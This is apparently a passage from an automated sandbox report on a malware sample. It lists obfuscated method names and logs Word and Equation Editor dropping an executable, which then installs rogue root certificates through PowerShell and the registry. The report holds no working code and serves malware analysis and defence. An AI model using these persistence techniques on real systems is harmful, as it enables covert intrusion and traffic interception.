                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, Xvr3YLNGwrNm4NZwvB.csHigh entropy of concatenated method names: 'UDQr8IS14h', 'SqorQSDk3E', 'JkUAXRyiNC', 'MxZA4OUEVm', 'XOkrlmYGdn', 'El8rORYZiY', 'zZwrLA8oTX', 'xKPrvvbgjm', 'nFJrW3Aw2s', 'HCuropyBI2'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, gFGLQUQObC5qQ0lCjG.csHigh entropy of concatenated method names: 'OvBemqwNU8', 'EoYeF4xmdo', 'uVReYFtpsC', 'WYPe0l4Jkg', 'wlleNxZbHk', 'sKxeC2RQiQ', 'o19ecKCXAa', 'igSePDPaDn', 'tbee3Dsww0', 'C9OeyJDbrf'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, AeDNYYHlu3VDqHZLHr.csHigh entropy of concatenated method names: 'WkiI3V4vJ', 'oBGuqejTZ', 'hhstBGGaT', 'Dd3wrQluM', 'QSsBVpXkL', 'f2r5x13Xl', 'RAYawt6wWaILic8Zur', 'RhQNS4WYJgUA7ognfS', 'IndAyxbvC', 'etSbJDeMJ'
                  Source: 5.2.cmnjgyugo61000.exe.8510000.6.raw.unpack, ibXryOsUOOV6l7fNKm.csHigh entropy of concatenated method names: 'kaN4cqGN2t', 'vFd4PBWreL', 'RwE4yUHCUB', 'ImC42hW0kt', 'qCV4SmB4VN', 'fdK4gaKuCc', 'uOD5p9CVIqLqY6AjMY', 'BDEuXcaNisbudQFChG', 'M7m44tBOuL', 'vuf4eZbtxd'

                  Persistence and Installation Behavior

                  barindex
                  Installs new ROOT certificates
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\CLLPdgxhnmwGf5Y[1].exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
